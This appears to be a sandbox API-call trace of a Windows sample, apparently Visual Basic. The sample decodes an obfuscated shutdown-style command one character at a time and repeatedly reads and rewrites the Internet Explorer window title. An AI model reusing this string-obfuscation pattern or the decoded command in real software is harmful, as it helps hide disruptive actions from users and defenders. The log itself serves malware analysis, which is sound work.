lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.261] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.262] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.262] GetForegroundWindow () returned 0x10162 [0174.351] GetLastError () returned 0x0 [0174.361] SysStringLen (param_1=" ") returned 0xff [0174.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0174.372] SysStringLen (param_1=" ") returned 0xff [0174.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0174.372] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0174.373] GetLastError () returned 0x0 [0174.373] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0174.374] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0174.374] SysStringLen (param_1="Blank Page - Windows Internet Explorer") returned 0x27 [0174.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blank Page - Windows Internet Explorer", cchWideChar=40, lpMultiByteStr=0x1168f7c, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blank Page - Windows Internet Explorer", lpUsedDefaultChar=0x0) returned 40 [0174.374] SetWindowTextA (hWnd=0x103c4, lpString="Blank Page - Windows Internet Explorer") returned 1 [0174.375] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0174.375] GetFocus () returned 0x0 [0174.375] lstrlenA (lpString="Blank Page - Windows Internet Explorer") returned 38 [0174.375] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1168f7c) returned 0x1 [0174.375] IsWindow (hWnd=0x103c4) returned 1 [0174.375] IsWindow (hWnd=0x103c4) returned 1 [0174.376] IsWindow (hWnd=0x103c4) returned 1 [0174.376] IsWindow (hWnd=0x103c4) returned 1 [0174.376] GetFocus () returned 0x0 [0174.376] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0174.377] GetFocus () returned 0x0 [0174.377] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x27) returned 0x10ebcd0 [0174.382] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x27, lParam=0x10ebcd0) returned 0x26 [0174.382] GetFocus () returned 0x0 [0174.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0174.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x1168f7c, cchWideChar=39 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 39 [0174.382] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.383] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.384] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0174.384] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.385] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.385] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.386] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.386] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.387] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.387] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.388] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.389] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.389] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.390] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.390] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.391] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.391] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.392] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.392] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0174.399] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.399] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.400] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.400] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.401] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.401] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.401] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.402] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.402] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.403] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.403] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.404] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0174.404] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.405] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.405] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.406] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.406] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.407] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0174.407] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.714] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.714] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.715] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.715] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.716] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.717] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.717] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.717] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.718] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.719] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.719] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.719] GetForegroundWindow () returned 0x10162 [0174.719] GetLastError () returned 0x0 [0174.719] SysStringLen (param_1=" ") returned 0xff [0174.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0174.720] SysStringLen (param_1=" ") returned 0xff [0174.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0174.720] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0174.725] GetLastError () returned 0x0 [0174.725] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0174.726] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0174.726] SysStringLen (param_1="Blan") returned 0x4 [0174.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blan", cchWideChar=5, lpMultiByteStr=0x116863c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blan", lpUsedDefaultChar=0x0) returned 5 [0174.727] SetWindowTextA (hWnd=0x103c4, lpString="Blan") returned 1 [0174.727] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0174.727] GetFocus () returned 0x0 [0174.727] lstrlenA (lpString="Blan") returned 4 [0174.727] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0174.727] IsWindow (hWnd=0x103c4) returned 1 [0174.728] IsWindow (hWnd=0x103c4) returned 1 [0174.728] IsWindow (hWnd=0x103c4) returned 1 [0174.728] IsWindow (hWnd=0x103c4) returned 1 [0174.728] GetFocus () returned 0x0 [0174.729] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0174.729] GetFocus () returned 0x0 [0174.729] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0174.729] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0174.729] GetFocus () returned 0x0 [0174.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0174.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=5 | out: lpWideCharStr="Blan") returned 5 [0174.730] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.730] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.731] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0174.731] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, 